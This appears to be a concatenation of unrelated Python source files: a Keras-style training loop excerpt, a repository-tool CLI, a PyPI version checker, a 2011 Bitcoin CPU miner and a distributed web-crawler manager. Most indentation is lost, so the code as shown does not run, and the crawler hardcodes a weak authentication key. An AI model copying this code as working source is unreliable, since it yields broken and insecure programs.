y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
            batch_size: integer. Number of samples per evaluation batch.
verbose: verbosity mode, 0 or 1.
sample_weight: Array of weights to weight the contribution
of different samples to the loss and metrics.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
# Validate user data.
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# Prepare inputs, delegate logic to `_test_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples.
Computation is done in batches.
# Arguments
x: the input data, as a Numpy array
                (or list of Numpy arrays if the model has multiple inputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case of mismatch between the provided
input data and the model's expectations,
or in case a stateful model receives a number of samples
that is not a multiple of the batch size.
"""
# Validate user data.
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# Prepare inputs, delegate logic to `_predict_loop`.
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
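    # Illustrative sketch (hypothetical arrays): `evaluate` returns scalars labelled by
    # `metrics_names` (a list when the model has metrics or several outputs), while
    # `predict` returns Numpy arrays of outputs; both loop over the data in batches
    # exactly as implemented above.
    #
    # >>> scores = model.evaluate(x_test, y_test, batch_size=128)
    # >>> dict(zip(model.metrics_names, scores))
    # >>> y_pred = model.predict(x_test, batch_size=128)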
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
# Arguments
x: Input samples, as a Numpy array.
# Returns
Numpy array(s) of predictions.
"""
x = _standardize_input_data(x, self._feed_input_names,
self._feed_input_shapes)
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins)
if len(outputs) == 1:
return outputs[0]
return outputs
@interfaces.legacy_generator_methods_support
def fit_generator(self, generator,
steps_per_epoch,
epochs=1,
verbose=1,
callbacks=None,
validation_data=None,
validation_steps=None,
class_weight=None,
max_q_size=10,
workers=1,
pickle_safe=False,
initial_epoch=0):
"""Fits the model on data yielded batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `steps_per_epoch`
batches have been seen by the model.
steps_per_epoch: Total number of steps (batches of samples)
to yield from `generator` before declaring one epoch
finished and starting the next epoch. It should typically
                be equal to the number of unique samples in your dataset
divided by the batch size.
epochs: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
validation_steps: Only relevant if `validation_data`
is a generator. Total number of steps (batches of samples)
                to yield from the validation generator before stopping.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
steps_per_epoch=10000, epochs=10)
```
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not validation_steps:
raise ValueError('When using a generator for validation data, '
'you must specify a value for '
'`validation_steps`.')
# Prepare display labels.
out_labels = self._get_deduped_metrics_names()
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger(count_mode='steps')]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'epochs': epochs,
'steps': steps_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation and not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('validation_data should be a tuple '
'`(val_x, val_y, val_sample_weight)` '
'or `(val_x, val_y)`. Found: ' +
str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y, val_sample_weight)
val_data = val_x + val_y + val_sample_weights
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_data += [0.]
for cbk in callbacks:
cbk.validation_data = val_data
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, workers=workers)
callback_model.stop_training = False
while epoch < epochs:
callbacks.on_epoch_begin(epoch)
steps_done = 0
batch_index = 0
while steps_done < steps_per_epoch:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# Construct epoch logs.
epoch_logs = {}
batch_index += 1
steps_done += 1
# Epoch finished.
if steps_done >= steps_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
validation_steps,
max_q_size=max_q_size,
workers=workers,
pickle_safe=pickle_safe)
else:
# No need for try/except because
# data has already been validated.
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
@interfaces.legacy_generator_methods_support
def evaluate_generator(self, generator, steps,
max_q_size=10, workers=1, pickle_safe=False):
"""Evaluates the model on a data generator.
The generator should return the same kind of data
as accepted by `test_on_batch`.
# Arguments
generator: Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: maximum size for the generator queue
workers: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_test_function()
steps_done = 0
wait_time = 0.01
all_outs = []
batch_sizes = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
batch_size = len(x[0])
elif isinstance(x, dict):
batch_size = len(list(x.values())[0])
else:
batch_size = len(x)
all_outs.append(outs)
steps_done += 1
batch_sizes.append(batch_size)
finally:
if enqueuer is not None:
enqueuer.stop()
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=batch_sizes)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=batch_sizes))
return averages
@interfaces.legacy_generator_methods_support
def predict_generator(self, generator, steps,
max_q_size=10, workers=1,
pickle_safe=False, verbose=0):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: Generator yielding batches of input samples.
steps: Total number of steps (batches of samples)
to yield from `generator` before stopping.
max_q_size: Maximum size for the generator queue.
workers: Maximum number of processes to spin up
when using process based threading
pickle_safe: If `True`, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
verbose: verbosity mode, 0 or 1.
# Returns
Numpy array(s) of predictions.
# Raises
ValueError: In case the generator yields
data in an invalid format.
"""
self._make_predict_function()
steps_done = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(workers=workers, max_q_size=max_q_size)
if verbose == 1:
progbar = Progbar(target=steps)
while steps_done < steps:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
# Compatibility with the generators
# used for training.
if len(generator_output) == 2:
x, _ = generator_output
elif len(generator_output) == 3:
x, _, _ = generator_output
else:
raise ValueError('output of generator should be '
'a tuple `(x, y, sample_weight)` '
'or `(x, y)`. Found: ' +
str(generator_output))
else:
# Assumes a generator that only
# yields inputs (not targets and sample weights).
x = generator_output
outs = self.predict_on_batch(x)
if not isinstance(outs, list):
outs = [outs]
if not all_outs:
for out in outs:
all_outs.append([])
for i, out in enumerate(outs):
all_outs[i].append(out)
steps_done += 1
if verbose == 1:
progbar.update(steps_done)
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
if steps_done == 1:
return all_outs[0][0]
else:
return np.concatenate(all_outs[0])
if steps_done == 1:
return [out for out in all_outs]
else:
return [np.concatenate(out) for out in all_outs]
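    # Illustrative sketch (hypothetical generators): the generator methods above are used
    # the same way as `fit_generator`; `steps` bounds how many batches are drawn from the
    # (possibly infinite) generator.
    #
    # >>> scores = model.evaluate_generator(val_generator, steps=50)
    # >>> preds = model.predict_generator(test_generator, steps=50, verbose=1)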
|
cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import argparse
import logging
import traceback
# TODO: feel free to PR if you know how to log tracebacks in a more elegant way;
# at the moment it for some reason doubles the traceback string
class MyLogger(logging.getLoggerClass()):
user = None
def makeRecord(self, name, lvl, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None):
if not extra:
extra = {}
extra['user'] = self.user or 'N/A'
        return super(MyLogger, self).makeRecord(name, lvl, fn, lno, msg, args, exc_info, func=func, extra=extra, sinfo=sinfo)
def error(self, msg, *args, **kwargs):
if sys.exc_info()[0]:
msg = str(msg) + "\n{}".format(traceback.format_exc().replace('%', '%%'))
return super(MyLogger, self).error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
if sys.exc_info()[0]:
msg = str(msg) + "\n{}".format(traceback.format_exc().replace('%', '%%'))
        return super(MyLogger, self).critical(msg, *args, **kwargs)
logging.setLoggerClass(MyLogger)
from . import repo_manage
from . import repo_daemon
from . import duploader
from . import distro_import
env_choices = ['unstable', 'testing', 'prestable', 'stable']
def main():
parser = argparse.ArgumentParser(description='Cacus repo tool')
parser.add_argument('-l', '--log', type=str, default='/dev/stderr',
                        help='Log to file (default stderr)')
parser.add_argument('-c', '--config', type=str,
                        help='Config file (default /etc/cacus.yaml)')
parser.add_argument('-v', '--verbosity', type=str, default='error',
help='Log file verbosity (default is "error")')
op_type = parser.add_mutually_exclusive_group()
op_type.add_argument('--create-indexes', action='store_true', help='Create MongoDB indexes')
op_type.add_argument('--duploader-daemon', action='store_true', help='Start duploader daemon')
op_type.add_argument('--repo-daemon', action='store_true', help='Start repository daemon')
op_type.add_argument('--gen-token', type=str, metavar='NAME',
help='Generate JWT token for NAME')
op_type.add_argument('--revoke-token', type=str, metavar='JTI',
help='Revoke JWT token with jti=JTI')
op_type.add_argument('--list-tokens', action='store_true',
help='List known JWT tokens')
op_type.add_argument('--get-token', type=str, metavar='JTI',
help='Get token by ID')
op_type.add_argument('--update-distro', metavar='DISTRO', nargs='?', help='Update distribution metadata')
op_type.add_argument('--import-distro', type=str, nargs=2, metavar=('URL', 'NAME'), help='Import distribution')
parser.add_argument('--download-packages', action='store_true', help='Download imported packages')
parser.add_argument('-t', '--threads', type=int, default=10, help='Import download threads')
parser.add_argument('-e', '--expire', type=int, help='Expiration period for JWT token')
parser.add_argument('-d', '--distro', type=str, nargs='*', help='Distros that will be manageable by this JWT token. If omitted, token will have root access.')
"""
op_type.add_argument('--upload', action='store_true', help='Upload package(s)')
op_type.add_argument('--remove', action='store_true', help='Remove package(s)')
op_type.add_argument('--dmove', nargs=2, metavar=('PKG', 'VER'), help='Dmove package(s)')
# op_type.add_argument('--import-repo', type=str, metavar='PATH', help='Import mounted dist.yandex.ru repo')
parser.add_argument('--from', choices=env_choices, help='From env')
parser.add_argument('--to', choices=env_choices, help='To env')
parser.add_argument('--repo', type=str, help='Repository')
parser.add_argument('--arch', type=str, help='Architecture')
parser.add_argument('--env', choices=env_choices, help='Environment')
parser.add_argument('pkgs', type=str, nargs='*')
"""
args = parser.parse_args()
if args.duploader_daemon:
duploader.start_daemon(args.config)
elif args.repo_daemon:
repo_daemon.start_daemon(args.config)
elif args.update_distro:
manager = repo_manage.RepoManager(config_file=args.config)
manager.update_distro_metadata(args.update_distro)
elif args.import_distro:
importer = distro_import.DistroImporter(args.threads, config_file=args.config)
importer.import_distro(args.import_distro[0], args.import_distro[1], download_packages=args.download_packages)
elif args.create_indexes:
manager = repo_manage.RepoManager(config_file=args.config)
manager.create_cacus_indexes()
manager.create_packages_indexes()
elif args.gen_token:
if not args.expire:
parser.error("Specify expiration period in days")
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
token = manager.generate_token(args.gen_token, args.expire, args.distro)
print("Generated token for '{}' with {}; valid for {} days:\n{}".format(
args.gen_token, 'access to distros: ' + ', '.join(args.distro) if args.distro else 'ROOT access',
args.expire, token))
elif args.revoke_token:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
if manager.revoke_token(args.revoke_token):
print("Revoked token with jti={}".format(args.revoke_token))
else:
print("Cannot find token with jti={}".format(args.revoke_token))
elif args.list_tokens:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
manager.print_tokens()
elif args.get_token:
manager = repo_manage.RepoManager(config_file=args.config, quiet=True)
print(manager.get_token(args.get_token))
else:
# default action is to start both duploader daemon and repo daemon
from multiprocessing import Process
repod = Process(target=repo_daemon.start_daemon, args=(args.config,))
duploaderd = Process(target=duploader.start_daemon, args=(args.config,))
repod.start()
duploaderd.start()
repod.join()
duploaderd.join()
if __name__ == '__main__':
main()
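# Illustrative usage (the installed entry-point name 'cacus' is an assumption; adjust to
# however this module is actually exposed):
#
#   cacus -c /etc/cacus.yaml --create-indexes
#   cacus -c /etc/cacus.yaml --gen-token deploy-bot -e 30 -d mydistro
#   cacus -c /etc/cacus.yaml --import-distro http://mirror.example.org/debian mydistro --download-packages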
|
__version__.py
|
# pylint: disable=C0415,C0413
# type: ignore
__version__ = "7.9"
def check_version():
def _check_version():
import sys
from distutils.version import LooseVersion as V
from xml.etree import ElementTree
import httpx
try:
latest_version = V(
ElementTree.fromstring(
httpx.get(
"https://pypi.org/rss/project/botoy/releases.xml", timeout=10
).text
)
.find("channel")
.find("item")
.find("title")
.text
)
except Exception:
pass
else:
local_version = V(__version__)
if local_version < latest_version:
                info = f"\n\033[33m==== Current version: \033[31m{local_version}\033[33m, a newer version \033[31m{latest_version}\033[33m is available, please update! ====\033[0m\n"
sys.stdout.write(info)
from threading import Thread
t = Thread(target=_check_version)
    t.daemon = True
t.start()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
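    # Illustrative config file for the parser above (key=value lines; '#' comment lines are
    # skipped). host/port match the fallbacks below; credentials and thread count are hypothetical:
    #
    #   host=127.0.0.1
    #   port=36350
    #   rpcuser=bitcoinrpc
    #   rpcpass=secret
    #   threads=4
    #   hashmeter=1
    #   scantime=30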
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 36350
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
node_manager.py
|
#!/usr/bin/env python3
from os import path
from multiprocessing.managers import BaseManager
from multiprocessing import Process, Queue
import time
from url_manager import UrlManager
from data_output import DataOutput
__author__ = 'Aollio Hou'
__email__ = 'aollio@outlook.com'
class NodeManager:
def start_manager(self, url_q, result_q):
"""
        Create a distributed manager.
        :param url_q: URL queue
        :param result_q: result queue
:return:
"""
BaseManager.register('get_task_queue', callable=lambda: url_q)
BaseManager.register('get_result_queue', callable=lambda: result_q)
        # Bind to port 8001 and set the auth key 'baike'. This essentially initializes the manager object.
manager = BaseManager(address=('127.0.0.1', 8001), authkey=b'baike')
return manager
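    # Illustrative sketch (not part of this module): how a crawler/worker node would attach
    # to the queues registered above. The registration names, address and authkey must match
    # the ones used in start_manager.
    #
    # >>> from multiprocessing.managers import BaseManager
    # >>> BaseManager.register('get_task_queue')
    # >>> BaseManager.register('get_result_queue')
    # >>> m = BaseManager(address=('127.0.0.1', 8001), authkey=b'baike')
    # >>> m.connect()
    # >>> task_q, result_q = m.get_task_queue(), m.get_result_queue()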
def url_manager_proc(self, url_q: Queue, conn_q: Queue, root_url):
print('url manager process start...')
url_manager = UrlManager()
url_manager.add_new_url(root_url)
print('url manager process started...')
while True:
while url_manager.has_new_url():
new_url = url_manager.get_new_url()
print('new_url', new_url)
                # Send the new URL to the worker nodes
url_q.put(new_url)
                # Stop condition: once more than 2000 links have been crawled, shut down and save progress
                if url_manager.old_url_size() > 2000:
                    # Notify the crawler nodes that the work is finished
                    url_q.put('end')
                    print('Control node sent the shutdown notification')
                    # Shut down the manager node and, at the same time, persist the URL sets
url_manager.save_process(path.join('dist', 'new_urls.txt'), url_manager.new_urls)
url_manager.save_process(path.join('dist', 'old_urls.txt'), url_manager.old_urls)
return
            # Add URLs received from result_solve_proc to the URL manager
try:
if not conn_q.empty():
urls = conn_q.get()
url_manager.add_new_urls(urls)
except BaseException as e:
time.sleep(0.1)
def result_solve_proc(self, result_q: Queue, conn_q: Queue, store_q: Queue):
while True:
try:
if not result_q.empty():
content = result_q.get()
if content['new_urls'] == 'end':
                        print('Result-parsing process received the notification and is exiting!')
                        store_q.put('end')
                        return
                    conn_q.put(content['new_urls'])  # new_urls is a set
                    store_q.put(content['data'])  # the parsed data is a dict
else:
time.sleep(0.1)
except BaseException as e:
time.sleep(0.1)
def store_proc(self, store_q: Queue):
output = DataOutput()
while True:
if not store_q.empty():
data = store_q.get()
if data == 'end':
                    print('Storage process received the notification and is exiting!')
output.flush_data()
output.output_end(output.filepath)
return
output.store_data(data)
else:
time.sleep(0.1)
def main():
print('init...')
    # Initialize the communication channels needed by the manager processes
    # url_q is the channel through which the URL manager process passes URLs to the crawler nodes
    url_q = Queue()
    # result_q is the channel through which crawler nodes return data to the data extraction process
    result_q = Queue()
    # conn_q is the channel through which the data extraction process submits new URLs to the URL manager process
    conn_q = Queue()
    # store_q is the channel through which parsed data reaches the storage process
    store_q = Queue()
    # Create the distributed manager
node = NodeManager()
manager = node.start_manager(url_q, result_q)
    # Create the URL manager process, the data extraction process and the data storage process
root_url = "https://baike.baidu.com/item/网络爬虫/5162711"
url_manager_proc = Process(target=node.url_manager_proc, args=(url_q, conn_q, root_url))
